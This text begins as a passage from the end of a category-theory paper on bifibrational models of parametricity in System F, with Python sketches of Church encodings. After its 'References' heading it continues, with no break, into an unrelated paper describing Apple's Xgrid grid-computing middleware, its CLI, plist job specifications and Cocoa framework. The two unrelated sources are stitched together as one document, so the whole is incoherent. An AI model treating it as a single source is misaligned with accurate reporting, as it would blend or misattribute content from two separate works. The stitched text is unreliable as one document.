the Beck-Chevalley condition, $\text{Eq}$ is full, and $B$ is well-pointed, then $(Z_o, in_o)$ is an initial $F_o$-algebra. We show in Section 6 that these hypotheses cannot be weakened. One may wonder if the above result can be strengthened to get not only an initial $F_o$-algebra, but also an initial $F_r$-algebra. Certainly this is possible for the relations fibration $\text{Rel} \to \text{Set} \times \text{Set}$, since relations in $\text{Rel}$ are proof irrelevant: maps either preserve relatedness or not. This translates in the axiomatic bifibrational setting to requiring the fibration $\text{Rel}(E) \to B \times B$ to be faithful. When it is, the weakly initial $F_r$-algebra is, in fact, initial: faithfulness implies the required uniqueness.
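Instantiating $F X = 1 + X$, the encoding $Z = \forall X.(F X \to X) \to X$ and the mediating morphism $\text{fold}$ of Lemma 5.5 can be illustrated by a small type-erased sketch (our illustration, not the paper's construction; with this $F$, an algebra is a pair of a zero case $z : X$ and a successor case $s : X \to X$, and $Z$ yields the Church naturals):

```python
# Z = forall X. (F X -> X) -> X with F X = 1 + X: a value of Z consumes
# an F-algebra (z, s) and returns the result of folding it.

def zero(alg):
    z, s = alg          # the algebra's zero case and successor case
    return z

def succ(n):
    # the structure map in_o applied to the successor summand
    return lambda alg: alg[1](n(alg))

def fold(z, s, n):
    # fold[A, (z, s)] : Z -> A, the mediating morphism of Lemma 5.5:
    # simply apply the encoded value to the algebra.
    return n((z, s))

three = succ(succ(succ(zero)))
assert fold(0, lambda x: x + 1, three) == 3         # interpret as an int
assert fold("", lambda x: x + "*", three) == "***"  # a different algebra
```

Theorem 5.7 is exactly the statement that, under its hypotheses, this `fold` is the *unique* algebra homomorphism out of $Z$, which is not provable by computation alone.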
### 5.3 Existence of final coalgebras We can also dualise the proof from the previous section to show the existence of final coalgebras in the usual manner [11]. As usual, this requires us to first encode products and existential types in System F. We encode products as $A \times B = \forall Y.(A \to B \to Y) \to Y$. This supports the usual pairing and projection operations, as well as surjective pairing using parametricity. We encode existential types by $\exists X.T = \forall Y.(\forall X.(T \to Y)) \to Y$. We can support introduction and elimination rules $$ \frac{\Gamma \vdash A \text{ type} \quad \Gamma; \Delta \vdash u : T[A/X]}{\Gamma; \Delta \vdash \langle A, u \rangle : \exists X.T} \qquad \frac{\Gamma; \Delta \vdash t : \exists X.T \quad \Gamma, Z; \Delta, y : T[Z/X] \vdash s : S}{\Gamma; \Delta \vdash \text{open } t \text{ as } \langle Z, y \rangle \text{ in } s : S} $$ (where $Z$ does not occur free in $S$) with the conversion $\text{open } \langle A, u \rangle \text{ as } \langle Z, y \rangle \text{ in } s = s[A/Z, u/y]$ by defining $\langle A, u \rangle = \Lambda Y.\lambda f.\ f\, A\, u$ and $\text{open } t \text{ as } \langle Z, y \rangle \text{ in } s = t\, S\, (\Lambda Z.\lambda y.\ s)$. Using parametricity we can prove the following commutation property and $\eta$-rule for existential types: **Lemma 5.8** Assume the underlying bifibration satisfies the Beck-Chevalley condition, and that $\text{Eq}$ is full. (i) Let $\Gamma; \Delta \vdash t : \exists X.T$, let $\Gamma, Z; \Delta, u : T[Z/X] \vdash s : S$ and let $\Gamma; \Delta \vdash f : S \to S'$ for a closed type $S'$. Then $[[f\,(\text{open } t \text{ as } \langle Z,u \rangle \text{ in } s)]]_o = [[\text{open } t \text{ as } \langle Z,u \rangle \text{ in } f(s)]]_o$. (ii) If $\Gamma; \Delta \vdash t : \exists X.T$, then $[[\text{open } t \text{ as } \langle Z,u \rangle \text{ in } \langle Z,u \rangle]]_o = [[t]]_o$. If $F : C \to C$ is an endofunctor, an $F$-coalgebra is a pair $(A, k_A)$ with $A$ an object of $C$ and $k_A : A \to FA$ a morphism. We call $A$ the carrier of the $F$-coalgebra and $k_A$ its structure map. A morphism $h : A \to B$ in $C$ is an $F$-coalgebra homomorphism $h : (A, k_A) \to (B, k_B)$ if $k_B \circ h = Fh \circ k_A$.
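The product and existential encodings above can be sketched with types erased, so that type abstraction $\Lambda$ and type application disappear and `pack` simply remembers the term component; the stream example at the end previews the coalgebra carrier $\exists X.(X \to FX) \times X$ used below. This is an illustrative sketch only, with our own function names:

```python
# Church products: A x B = forall Y. (A -> B -> Y) -> Y
pair = lambda a, b: (lambda k: k(a, b))
fst = lambda p: p(lambda a, b: a)
snd = lambda p: p(lambda a, b: b)

# Existentials: exists X. T = forall Y. (forall X. (T -> Y)) -> Y.
pack = lambda t: (lambda k: k(t))   # <A, t> = /\Y. \f. f A t  (A erased)
open_ = lambda t, s: t(s)           # open t as <Z, y> in s = t S (/\Z. \y. s)

p = pair(1, "x")
assert (fst(p), snd(p)) == (1, "x")

# exists X. ((X -> int) x X), with hidden representation X = str:
w = pack(pair(len, "abcd"))
assert open_(w, lambda impl: fst(impl)(snd(impl))) == 4

# W = exists X. (X -> F X) x X with F X = int x X gives streams:
def unfold(step, seed):
    # package a coalgebra step : X -> (int, X) with a seed of type X
    return pack(pair(step, seed))

def take(n, w):
    # observe the first n heads of a packaged stream
    out = []
    def go(impl):
        step, x = fst(impl), snd(impl)
        for _ in range(n):
            head, x = step(x)
            out.append(head)
    open_(w, go)
    return out

nats = unfold(lambda n: (n, n + 1), 0)
assert take(4, nats) == [0, 1, 2, 3]
```

The client of `open_` never learns the hidden representation type, which is the type-erased shadow of the abstraction property that parametricity makes precise.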
An $F$-coalgebra $(W, out)$ is weakly final if, for any $F$-coalgebra $(A, k_A)$, there exists a mediating $F$-coalgebra homomorphism $\text{unfold}[A, k_A] : (A, k_A) \to (W, out)$. It is a final $F$-coalgebra if $\text{unfold}[A, k_A]$ is unique. Let $F = (F_o, F_r) : \text{Rel}(U) \to_{\text{Eq}} \text{Rel}(U)$ be a functor with a strength $t$. We show that the final $F_o$-coalgebra exists. Again, we first construct a weakly final coalgebra by defining $W = (W_o, W_r) = [\exists X. (X \to F X) \times X]$. **Lemma 5.9** $W_o$ is the carrier of a weakly final $F_o$-coalgebra $(W_o, out_o)$ with mediating morphism $\text{unfold}_o[A,k]$ and $W_r$ is the carrier of a weakly final $F_r$-coalgebra $(W_r, out_r)$ with mediating morphism $\text{unfold}_r[A,k]$. We proceed similarly to Lemma 5.6. This time, we use the opfibrational part of the Graph Lemma to construct $F_r$-coalgebras. **Lemma 5.10** Assume the underlying bifibration satisfies the Beck-Chevalley condition, and that $\text{Eq}$ is full. (i) For every $F_o$-coalgebra morphism $h : (A, k_A) \to (B, k_B)$ we have $\text{unfold}_o[B, k_B] \circ h = \text{unfold}_o[A, k_A]$. (ii) $\text{unfold}_o[W_o, out_o] = \text{id}_{W_o}$. Putting things together, we have constructed a final coalgebra. **Theorem 5.11** If the underlying bifibration satisfies the Beck-Chevalley condition, and if $\text{Eq}$ is full, then $(W_o, out_o)$ is a final $F_o$-coalgebra. **5.4 Parametricity Implies Dinaturality** We show that our axiomatic foundations can be used to prove that dinaturality can be deduced from parametricity. This is well-known in other settings (see, e.g., [4, Section 5.1]), but we do it because (i) it shows our foundation passes this test; and (ii) it highlights again the use of bifibrations to give two definitions of the graph of a function, both of which are used in the proof.
First, the definition of dinaturality: **Definition 5.12** If $F, G : \mathcal{B}^{op} \times \mathcal{B} \to \mathcal{B}$ are mixed variant functors, then a dinatural transformation $t : F \to G$ is a collection of morphisms $t_X : FXX \to GXX$ indexed by objects $X$ of $\mathcal{B}$ such that, for every $g : X \to Y$ of $\mathcal{B}$, the following hexagon commutes: $$ G(\text{id}_X, g) \circ t_X \circ F(g, \text{id}_X) \;=\; G(g, \text{id}_Y) \circ t_Y \circ F(\text{id}_Y, g) \;:\; FYX \to GXY $$ We note that our proof applies to all mixed variant functors with equality preserving liftings, not just strong such functors. **Theorem 5.13** Let $(F_o, F_r), (G_o, G_r) : \text{Rel}(U)^{op} \times \text{Rel}(U) \to_{\text{Eq}} \text{Rel}(U)$. Further, let $t^0_A : F_o AA \to G_o AA$ be a family indexed by objects $A$ of $\mathcal{B}$, and $t^1_R : F_r RR \to G_r RR$ be a family indexed by objects $R$ of $\text{Rel}(E)$ such that if $R$ is over $(A, B)$, then $t^1_R$ is over $(t^0_A, t^0_B)$. Then $t^0$ is a dinatural transformation from $F_o$ to $G_o$. Theorem 5.13 applies in particular to the interpretation of terms $t : \forall X.FXX \to GXX$ where $F$ and $G$ are given by type expressions with two free type variables, one occurring positively and one negatively. As is well known, dinaturality reduces to naturality when $F$ and $G$ are covariant. 6 Examples The construction of examples remains delicate — for instance, there are no set-theoretic models with a classical meta-theory. We give five models: Examples 6.1, 6.3, 6.4 and 6.5 are to be regarded as being internal to the Calculus of Constructions with impredicative Set (with ¬¬-stable equality for Example 6.3), while Example 6.2 is internal to the category of ω-sets. Before doing so, we take a moment to emphasise the generality of our framework. Considering different fibrations, we can derive parametric models with very different flavours. For example, changing the base category of the fibration corresponds to changing the ‘standard’ model in which we interpret types and terms.
Changing the total category and the fibration (i.e., the functor itself) corresponds to changing the relevant notion of relational logic. We take advantage of the possibility of non-standard relations in Examples 6.2, 6.3 and Non-example 6.5. Example 6.1 Reynolds’ set-theoretic model is an instance of our framework via the relations fibration on Set. The equality functor is full and faithful in this bifibration, and Set is well-pointed. Hence Theorems 5.7 and 5.13 ensure that initial algebras exist, and that all terms are interpreted as dinatural transformations. Example 6.2 The PER model of Bainbridge et al. [2] is an instance of our framework, if bifibrations are understood as internal to the category of ω-sets, so that natural transformations are uniformly realised; a detailed construction uses a category of PERs internal to ω-sets. An object of the category $\text{PER}_{\mathbb{N}}$ is a symmetric, transitive relation $R \subseteq \mathbb{N} \times \mathbb{N}$. A morphism from $R$ to $S$ is a function $f : \mathbb{N}/R \to \mathbb{N}/S$ that is tracked by some partial recursive function $\phi_k : \mathbb{N} \to \mathbb{N}$, i.e., such that $f([n]_R) = [\phi_k(n)]_S$ for all $[n]_R \in \mathbb{N}/R$. The appropriate notion of predicate with respect to a PER $R$ is that of a saturated subset, i.e., a subset $P \subseteq \mathbb{N}$ such that $P(x)$ and $R(x,x')$ implies $P(x')$. Saturated subsets form a bifibration over PERs with a full and faithful equality functor $\text{Eq}\,A = A$. The CCC structure of $\text{PER}_{\mathbb{N}}$ and $\text{SatRel}$ is standard; a bijective pairing function $\langle , \rangle : \mathbb{N} \times \mathbb{N} \to \mathbb{N}$ gives the product and recursion theory (the s-m-n Theorem) gives the exponential.
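The defining conditions of a PER and of a saturated subset can be checked directly over a finite fragment of $\mathbb{N}$ (a toy sketch ignoring realisability and tracking; the names `is_per` and `is_saturated` are ours):

```python
# A PER is a symmetric, transitive relation R on (a fragment of) N.
def is_per(r):
    sym = all((b, a) in r for (a, b) in r)
    trans = all((a, d) in r for (a, b) in r for (c, d) in r if b == c)
    return sym and trans

# A subset P is saturated w.r.t. R if P(x) and R(x, x') imply P(x').
def is_saturated(p, r):
    return all(y in p for x in p for (a, y) in r if a == x)

# The "mod 2" PER on {0..5}: n related to m iff they have the same parity.
R = {(n, m) for n in range(6) for m in range(6) if n % 2 == m % 2}
assert is_per(R)
assert is_saturated({0, 2, 4}, R)    # the evens form a saturated subset
assert not is_saturated({0, 1}, R)   # {0, 1} mixes classes: not saturated
```

Saturation is exactly the condition that a predicate respects the partial equivalence, which is what makes saturated subsets the right fibre objects over $\text{PER}_{\mathbb{N}}$.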
The interesting case is that of forall types, which are interpreted as (cut down, to ensure equality preservation) intersections of PERs: $[\forall X.F]_o(R) = \{(n,k) \in \bigcap_{S : \text{PER}_{\mathbb{N}}} [F]_o(R,S) \mid \forall S, T : \text{PER}_{\mathbb{N}},\ Q : \text{SatRel}(S,T).\ (n,n), (k,k) \in [F]_r(\text{Eq}(R),Q)\}$ and $[\forall X.F]_r(P) = \bigcap_{Q : \text{SatRel}(S,T)} [F]_r(P,Q)$. Since $\text{PER}_{\mathbb{N}}$ is also well-pointed, Theorems 5.7 and 5.13 again apply. Example 6.3 The previous models are well-known, but our framework also suggests new ones. A relation $R \subseteq X \times Y$ can be understood classically as a function from $X \times Y$ to $\text{Bool}$. (Constructively, this only covers decidable relations.) Here, $\text{Bool}$ can be replaced with any constructively completely distributive [8] non-trivial lattice $\mathcal{V}$ of “truth values”, leading to “multi-valued parametricity”. For instance, the collection $\mathcal{D}(L)$ of all down-closed subsets of a complete lattice $L$ is constructively completely distributive, and classically, we recover $\text{Bool}$ as $\mathcal{D}(1)$. The category $\text{Fam}(\mathcal{V})$ has objects $(A,p)$, where $A$ is a set and $p : A \to \mathcal{V}$ is thought of as a $\mathcal{V}$-valued predicate. The families fibration $\pi : \text{Fam}(\mathcal{V}) \to \text{Set}$ is a bifibration with $\Sigma_f(Q)(y) = \sup_{f(x)=y} Q(x)$, fibred terminal objects $(X, \lambda x.\, \top)$, where $\top$ is the greatest element of \( \mathcal{V} \), and comprehension given by \( \{ (A, p) \} = p^{-1}(\top) \). Since \( \mathcal{V} \) is complete, it is a Heyting algebra, so that \( \pi : \text{Fam}(\mathcal{V}) \to \text{Set} \) is a fibred CCC. Also, \( \pi \) has simple products given by \( \Pi(A \times B, p)(a) = \inf_{b \in B} p(a, b) \). By Lemma 4.4, \( \text{Rel}(\pi) \) is thus an equality preserving arrow fibration. Finally, the interpretation of forall types is again given by suitably cut-down infima, as in Example 6.2. Non-example 6.4 For the relations fibration over the category of \( G \)-sets for a non-trivial group \( G \), the interpretation of \( \forall X.\, X \to X \) is not the singleton \( G \)-set 1 as expected, but instead contains all the elements of the group \( G \). We conjecture that this non-example also extends to a constructive treatment of the category of nominal sets [23]. Non-example 6.5 The identity fibration \( \text{Id} : \text{Set} \to \text{Set} \) models ad hoc polymorphism: it is a \( \forall \)- and arrow-fibration, but the equality functor \( \text{Eq}\, X = X \times X \) is not full. This explains why Theorem 5.13 fails: the interpretation of forall types includes ad hoc polymorphic functions, so that e.g. \( \forall X.\, X \to X \) contains non-natural transformations such as \( \eta \), where \( \eta_{\text{Bool}}(x) = \neg x \) and \( \eta_X(x) = x \) for \( X \neq \text{Bool} \). 7 Conclusions and future work Our interpretation of types and terms as fibred functors and fibred natural transformations shows that parametricity entails replacing the usual categorical semantics involving categories, functors, and natural transformations with one based on fibrations, fibred functors, and fibred natural transformations. The results in Section 5 show that our new approach based on bifibrations hits the sweet spot of a light structure that still suffices to prove key results. Work is ongoing in using the bifibrational framework to develop new notions such as proof-relevant parametricity, and higher order parametricity with interesting links to cubical sets that also appear in the semantics of Homotopy Type Theory [3]. Acknowledgement We thank the reviewers of this and previous versions of the paper for their comments and suggestions. We especially thank Uday Reddy for extremely valuable advice and encouragement. Research supported by EPSRC grants EP/K023837/1 (NG, FNF), EP/M016951/1 (NG), NSF award 1420175 (PJ), and SICSA (FO). References
Building Computational Grids with Apple’s Xgrid Middleware Baden Hughes Department of Computer Science and Software Engineering The University of Melbourne, Parkville VIC 3010, Australia Email: badenh@csse.unimelb.edu.au Abstract Apple’s release of the Xgrid framework for distributed computing introduces a new technology solution for loosely coupled distributed computation. In this paper we systematically describe, compare and evaluate the Apple native Xgrid solution and a range of third party components which can be substituted for the native versions. This description and evaluation is grounded in practical experience of deploying a small scale, internationally distributed, heterogeneous computational infrastructure based on the Xgrid framework. Keywords: Xgrid, Apple, computational grid, middleware 1 Introduction The release in 2005 of Apple’s Xgrid framework for grid computing introduces a new technology solution for loosely coupled, distributed computation. Xgrid has been widely promoted as an extremely usable solution for less technical user communities, and challenges the systems management paradigm incumbent in many computational grid solutions currently deployed. As such, the uptake of grid computing by ad hoc groups of researchers with non-dedicated infrastructure using the Xgrid framework has been significant, both in numerical terms and in terms of the visibility of the solution. A particular point to note is that the simple Xgrid framework has the potential to fundamentally change the delineation between grid users and grid maintainers, and as such to promote new types of research enabled by a self-sustaining model for managing computational grid infrastructure. For researchers in the grid computing space and for systems managers of production grid facilities, Xgrid has often been viewed as a toy solution.
This paper seeks to counter this perception in two ways: first by describing the Xgrid architecture and its components in detail, and secondly by adopting an analysis model more prevalent in the grid computing domain. A notable point here is that this paper does not simply cover the Apple-distributed native Xgrid components, but also considers a range of third party components which can be used to extend the Xgrid framework in directions more amenable to the types of production environments currently occupied by solutions such as the widely used Globus toolkit. The structure of this paper is as follows. First we consider the overall positioning of the Apple Xgrid solution, and its high level systems architecture. Next we review in depth the Xgrid architecture and components officially distributed by Apple in Xgrid 1.0. Following this we review a range of interoperable third party components that can be used to complement or replace the proprietary Apple components under certain circumstances. We report experience in using a heterogeneous Xgrid to perform some experiments in natural language processing, and on a range of other production uses of Xgrid based on published papers and user group surveys. Finally, we conduct an evaluation of the overall strengths and weaknesses of the Xgrid solution, consider the niche(s) into which Xgrid based solutions may effectively be deployed, and offer some concluding thoughts. It is worth stating upfront that this paper specifically does not seek either to conduct empirical performance comparisons between Xgrid and alternative grid computing solutions or to report the results of a specific scientific experiment which is enabled by Xgrid-based infrastructure. Rather, the purpose of this paper is to describe, and where relevant compare and evaluate, the overall Xgrid architecture and its components from a functional perspective.
2 A Brief History of Xgrid Xgrid was first introduced by Apple in January 2004 as a Technology Preview (TP1). Xgrid TP1 was considered a proof of concept, and was not designed for production applications owing to reliability, security and scalability issues. Rather, it was designed to draw feedback from early adopters as to the viability of an Apple grid computing product. Xgrid Technology Preview 2 (TP2) was released in November 2004, retaining most of the functionality of TP1, but with some changes to the underlying CLI and data formats. This was a very widely adopted release: Xgrid-based computational environments were deployed for production use, and third party components began to emerge. Xgrid 1.0 was released with Mac OS X 10.4 ‘Tiger’ in April 2005. Xgrid 1.0 introduced a significant number of changes. Perhaps controversially, Xgrid 1.0 included a dependency on Mac OS X Server (TP1 and TP2 did not require a server grade operating system), which allowed Apple to leverage the significant investment it had made in Mac OS X Tiger Server in the areas of scalability, single sign on, job specific authorization, server local and remote administration, server grade documentation, and the inclusion of a GUI based interaction model (TP1 and TP2 only had a CLI). 3 Solution Architecture The Apple Xgrid architecture is a standard three tier architecture consisting of a Client, Controller and Agent. We will review each of these tiers in turn. The Controller, Agent and Client can all exist on a single machine, although in practice these are more typically distributed. 3.1 Client An Xgrid client provides the user interface to an Xgrid system. The client is responsible for finding a suitable controller, submitting a job, and retrieving the results. Clients can rely on the controller to mediate all job submissions; they do not need to be aware of the actual job execution schedule across available computational agents.
It is useful to note that an Xgrid client is detachable from the network even while jobs are being executed - completed jobs are retrieved by the client from the controller once network connectivity is re-established. 3.2 Controller The controller, representing the middle tier, is the centre of the Xgrid framework. A controller typically runs on a dedicated system (like a cluster head node). The controller handles receiving jobs from clients, dividing them into tasks to execute on various agents, and collecting and returning the results. 3.3 Agent The final tier in the Xgrid solution is the Agent. Typically there is one agent per compute node, not dissimilar to other grid computing frameworks, although natively Xgrid agents on dual-CPU nodes default to accepting one task per CPU (similar policies are often implemented in a cluster LRMS). As with other computational grid solutions, Xgrid allows for a range of agent types: full-time agents, part-time (cycle stealing) agents, and remote agents (for distributed computational grids). 4 Xgrid Systems Configuration and Management The client, controller and agent software ships standard with Apple’s Mac OS X 10.4 (Tiger) operating system. As such, the systems management task is largely configuration oriented rather than installation oriented. A simplified configuration can be set up in less than 5 minutes, significantly reducing the barrier to entry for less technical users. Desktop systems or dedicated cluster nodes can be configured and enabled as Xgrid agents either locally through the Sharing pane in their System Preferences application, or remotely via SSH or one of Apple's network-based desktop management tools (Apple Remote Desktop, NetBoot, or Network Install).
For larger installations, Xgrid supports the Apple NetBoot service, which allows nodes to load a standard configured operating system image from a central server (similar to the types of systems typically used for cluster management). Mac OS X Server systems are configured and enabled as Xgrid agents or controllers through the standard Server Admin application suite. Server installations provide the host infrastructure to manage authentication, which can include none, shared password, or Single Sign On (using a Kerberized service such as LDAP or Active Directory). Notably, in this area Xgrid does not adopt the X.509 certificate based authentication prevalent in other computational grid middleware suites. Service control is also enabled via the Server Admin environment - in addition, there is a command line control interface for Xgrid, which allows service management (with the exception of authentication policies) from a shell environment. The discovery mechanism in Xgrid is that both clients and agents natively search for a controller. The controller is the only Xgrid component that requires an open TCP port for such discovery requests. All communications between clients, controllers and agents can be strongly encrypted over the network, ensuring in-transit security across segregated administrative domains. Xgrid can automatically discover available resources on a local network via Apple's ZeroConf service discovery implementation (Bonjour, formerly known as Rendezvous). Discovery is recursive within a domain or subdomain; alternatively, Xgrid configurations can be created by manually entering IP addresses or hostnames. 5 Xgrid Job Management Xgrid jobs are expressed in Apple’s standard plist format (Apple, 2005a). Further details of the expression are provided in a later section in the context of the Xgrid Command Line Interface. Jobs can be submitted to the Xgrid controller using a range of client tools (discussed below).
In all cases, an accompanying job specification is used by the controller to determine whether (and how) to decompose a submitted job, the code and data payloads for a given job, and whether the job submission is to be synchronous or asynchronous. Xgrid controllers schedule jobs in the order they are received, assigning each task to the fastest agent available at that time (determined by active probing of the current computational load of each agent). Alternatively, the job specification allows dependencies among jobs and tasks to be expressed, to ensure scheduling in the proper order. In most cases, if any job or task fails, the scheduler will automatically resubmit it to the next available agent. Xgrid tasks using password-based authentication will minimize possible interactions with the rest of the system by executing as unprivileged Xgrid users (by default the system user nobody, in the system’s /tmp directory). Tasks using single sign-on for both clients and agents will run as the submitting user, allowing appropriate access to local files or network services. Because of the three-tier architecture of Xgrid, clients can submit jobs to the controller asynchronously, then disconnect from the network as mentioned earlier. The controller will cache all the required data, manage scheduling and task-level failover, then hold and return all the results, including standard output and standard error from each task. If requested, the controller will notify the user via email that the job has been completed. The user can then retrieve the results from any authenticated Xgrid client system using the relevant job ID.

### 6 Xgrid System Scalability

Apple’s published scalability benchmarks are relatively modest: Xgrid 1.0 has been tested on configurations of up to 128 agents; 20,000 queued jobs (or 100,000 tasks per job); 2Gb submitted data per job; 1Gb results per task; and 10Gb aggregate results per job.
Most notably, this testing is in a cluster (rather than distributed) mode. Some of these benchmarks have been exceeded, as discussed further in the section entitled ‘Other Use Cases’ elsewhere in this paper.

### 7 Xgrid Native Components

Having described the high level architecture of Xgrid, in this section we review the official Xgrid architecture and components as distributed in Xgrid 1.0. A diagrammatic representation can be seen in Figure 1. We proceed to describe the Xgrid clients, controller and agents in that order.

### 7.1 Xgrid Graphical User Interface

Mac OS X ships with a simple GUI based interface to Xgrid called Xgrid.app, which supports only a few basic functions: viewing the Xgrid Agents and some basic properties of each Agent from a single Controller; submitting single-task jobs via a GUI; and retrieving job status and results. This being said, Xgrid.app is a demonstrator application, and it is not promoted for tasks more complicated than basic testing. The other interfaces, discussed next and in the third party section, are much more fully featured.

### 7.2 Xgrid Command Line Interface

The Xgrid framework has a well documented Command Line Interface (CLI). The Xgrid command line client is simply called xgrid. xgrid takes a small number of parameters, viz. an executable, an input file or input directory, and an output file or output directory. Executables do not have to be supplied as transfer objects; they can be instantiated from a locally installed version of the executable. The executable (if required) and the input file or directory are copied to the Agent, after which execution takes place. Standard error and result streams are returned to the controller after execution. Naturally, such a simple set of parameters makes it easy to wrap the CLI directly in a language such as Unix shell. The CLI can be instantiated in two different ways depending on whether synchronous or asynchronous execution is required.
For synchronous execution:

xgrid -h $HOSTNAME -job run -in $INPUTFILE -out $OUTPUTFILE

where $HOSTNAME is the fully qualified host name and domain; $INPUTFILE is the input file or directory containing the payload data; and $OUTPUTFILE is the output file or directory for the results. For asynchronous execution:

xgrid -h $HOSTNAME -job submit -in $INPUTFILE -out $OUTPUTFILE

where the parameters are the same as for synchronous execution, although the command is changed from run to submit. The job submission process returns a numerical job identifier ($ID), which can then be used to query the status of the job on the computational grid, viz. xgrid -job attributes -id $ID. The output of a status query includes a number of fields and corresponding values, viz. activeCPUPower (number of CPU cycles currently consumed by the job); applicationIdentifier (name of the application which instantiated the job); dateNow (current date and time); dateStarted (date and time the job was started); dateStopped (date and time the job finished); dateSubmitted (date and time the job was submitted); jobStatus (either running or finished); name (the executable name); percentDone (a numerical indicator of progress); taskCount (the number of tasks done); and undoneTaskCount (the number of tasks pending). The results of jobs can be retrieved again using the job identifier, viz. xgrid -job results -id $ID.

In addition to single-task jobs, the Xgrid CLI also supports multi-task jobs by virtue of a batch mode which supports job specification via a plist, a property list file similar in type to the more commonly used plan file in other grid environments (Apple, 2005). An example plist is shown below; it executes the Unix calendar program to generate the March 2005 output.

```plaintext
{
    jobSpecification = {
        applicationIdentifier = "com.apple.xgrid.cli";
        inputFiles = { };
        name = "Calendar";
        submissionIdentifier = calendar;
        taskSpecifications = {
            0 = { arguments = (3, 2005); command = "/usr/bin/cal"; };
        };
    };
}
```

The CLI syntax for instantiation is slightly different with the use of a plist: xgrid -job batch $PLISTFILE. Likewise, the status output from the Xgrid CLI in response to a specification query (xgrid -job specification -id $ID) is as follows:

```plaintext
jobSpecification = {
    applicationIdentifier = "com.apple.xgrid.cli";
    inputFiles = { };
    name = "Calendar";
    submissionIdentifier = calendar;
    taskSpecifications = {
        0 = { arguments = (3, 2005); command = "/usr/bin/cal"; };
    };
}
```

A plist can be extended with multiple arguments or commands or both as necessary, each task with an arbitrary identifier. A plist can also be expressed as XML, which adds a degree of flexibility as to how these job specifications are created. The same specification expressed as an XML plist is shown below:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>jobSpecification</key>
    <dict>
        <key>applicationIdentifier</key>
        <string>com.apple.xgrid.cli</string>
        <key>inputFiles</key>
        <dict/>
        <key>name</key>
        <string>Calendar</string>
        <key>submissionIdentifier</key>
        <string>calendar</string>
        <key>taskSpecifications</key>
        <dict>
            <key>0</key>
            <dict>
                <key>arguments</key>
                <array>
                    <string>3</string>
                    <string>2005</string>
                </array>
                <key>command</key>
                <string>/usr/bin/cal</string>
            </dict>
        </dict>
    </dict>
</dict>
</plist>
```

### 7.3 XGridFoundation

In order to support developers building native Mac OS X GUI based applications, Apple provides XGridFoundation, a Mac OS X Cocoa framework based on Objective-C. XGridFoundation can be used by any Cocoa application by including the relevant header files, e.g. #import <XGridFoundation/XGridFoundation.h>.
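Because the CLI surface just described is so small, it scripts easily. The sketch below wraps the synchronous/asynchronous modes and batch submission; the wrapper functions, the XGRID_BIN override, and all host and file names are illustrative, not part of Xgrid. XGRID_BIN defaults to echo so the script dry-runs (printing the argument lists) without a live controller; set XGRID_BIN=xgrid to submit for real.

```shell
#!/bin/sh
# Illustrative wrapper around the xgrid CLI invocations described above.
# XGRID_BIN defaults to echo for a dry run; set XGRID_BIN=xgrid for real use.
XGRID_BIN="${XGRID_BIN:-echo}"

# xgrid_job HOST MODE INPUT OUTPUT
#   MODE is "run" (synchronous) or "submit" (asynchronous).
xgrid_job() {
    host="$1"; mode="$2"; input="$3"; output="$4"
    case "$mode" in
        run|submit) ;;
        *) echo "mode must be run or submit" >&2; return 1 ;;
    esac
    "$XGRID_BIN" -h "$host" -job "$mode" -in "$input" -out "$output"
}

# xgrid_batch PLISTFILE - submit a multi-task job specification.
xgrid_batch() {
    "$XGRID_BIN" -job batch "$1"
}

# Write the single-task calendar specification shown above to a file.
cat > calendar-job.plist <<'EOF'
{
    jobSpecification = {
        applicationIdentifier = "com.apple.xgrid.cli";
        inputFiles = { };
        name = "Calendar";
        submissionIdentifier = calendar;
        taskSpecifications = {
            0 = { arguments = (3, 2005); command = "/usr/bin/cal"; };
        };
    };
}
EOF

# Dry runs (echo prints the argument lists instead of contacting a controller):
xgrid_job controller.example.org submit data/ results/
# prints: -h controller.example.org -job submit -in data/ -out results/
xgrid_batch calendar-job.plist
# prints: -job batch calendar-job.plist
```

A real asynchronous submission would instead print a numerical job identifier, which can then be passed back via -id for status and results queries as shown above.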
In order to understand the underlying architecture of the Xgrid framework, and because such frameworks are not particularly common among grid computing middleware suites, we consider in detail the specific classes exposed by XGridFoundation. The classes are described in approximately the order they are encountered in a typical application.

- XGConnection is used to represent a connection to an Xgrid server. It can be initialized with a host name, or via Bonjour.
- XGAuthenticator is used at connection instantiation when the connection requires some form of authentication with the Xgrid server. XGAuthenticator is an abstract class whose subclasses are used by an XGConnection to authenticate.
- XGTwoWayRandomAuthenticator is a subclass of XGAuthenticator which is used to perform password based authentication.
- XGGSSAuthenticator is a subclass of XGAuthenticator which authenticates with Single Sign-On (eg LDAP).
- XGController: instances of this class are proxies for Xgrid controllers. They are initialized with an XGConnection, and are used to submit jobs.
- XGActionMonitor is a class used to monitor the activity of some asynchronous requests, such as submitting a job via an XGController.
- XGResource is an abstract class which represents grid resources, like grids and jobs. Instances of subclasses of XGResource are proxies for entities on the Xgrid server.
- XGGrid is a subclass of XGResource which represents the grids on the Xgrid controller.
- XGJob is a subclass of XGResource which represents the jobs running on an Xgrid controller.
- XGFile is a file or stream that is stored on the Xgrid controller.
- XGFileDownload is a class used to retrieve files and streams from the Xgrid controller after a job is complete.

A complete description of all Cocoa classes and methods can be found in (Apple, 2005b). A significant point of differentiation between Xgrid and other grid computing middleware suites is that the programmatic framework is fully vendor supported by Apple.
### 7.4 Xgrid Controller

The Xgrid Controller has the primary task of managing communications between the various components of the Xgrid. It interfaces with the Clients (as described above) and the Agents (as described later). The controller interprets job submissions from the client, decomposes them as appropriate, then instantiates execution by transferring the job to the next available Agent. In addition, the Controller monitors each Agent directly and determines availability based on current CPU consumption, with the Agent showing the lowest CPU consumption deemed the next available. There can only be one Controller per logical grid, although each controller can have an arbitrary number of Agents connected to it. A Controller is typically hosted in a high availability network location, with a fixed IP address and TCP port 4111 open for Agent and Client communication. Typically the Controller is installed on the same subnet as Agents and Clients, facilitating discovery using one of the various Apple resolution protocols. The Xgrid Controller has a command line administration tool, xgridctl, which can be used to start, stop and restart the Controller instance. This tool is very similar to the widely used apachectl, and can also be used to control a local agent via a simple command line switch. In addition to command line administration of the Controller, Apple distributes the Xgrid Admin tool, a GUI administration tool for Xgrid, usable on any Mac running an Xgrid Client, Agent or Controller. The Xgrid Admin tool allows a user to log in to a Controller and monitor its activities, including measuring its CPU capacity; reviewing pending, active and completed jobs; and querying agents for their status and job progress.

### 7.5 Xgrid Tiger Agent

The Xgrid Agent actually executes the computational tasks specified by a job.
